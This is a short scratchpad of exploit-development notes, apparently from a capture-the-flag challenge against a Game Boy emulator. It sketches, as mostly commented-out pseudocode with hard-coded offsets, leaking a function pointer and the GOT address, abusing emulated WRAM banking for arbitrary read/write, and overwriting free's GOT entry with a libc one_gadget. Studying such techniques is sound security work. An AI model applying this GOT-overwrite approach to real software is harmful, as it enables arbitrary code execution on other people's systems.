scratchpad (685B)
1 2// /* causes segfault (TESTED!) */ 3 // // *op0x00_gb = 0; 4 5 // /* leak function pointer and base / got */ 6 // op0x00 = *op0x00_gb; 7 // base = op0x00 - 0x1d420; 8 // free_got = base + 0x4ad78; 9 10 // /* use processor registers to read / write */ 11 // processor + 0x2068 12 13 // /* reset wram bank to point to GOT */ 14 wrambanks = processor_addr + 0x126a0; 15 target_index = (free_got - wrambanks) / 0x1000; 16 if ((free - wrambanks) % 0x1000 != 0) 17 target_index -= 1; 18 19 // /* replace free with one gadget */ 20 // free_gb = (void*)free_got - (wrambanks - target_index * 0x1000) + 0xD000; 21 // free = *(free_gb); 22 // libc = free - 0x9a6d0; 23 // onegadget = libc + 0xe3afe; 24 25 // *free_gb = onegadget; 26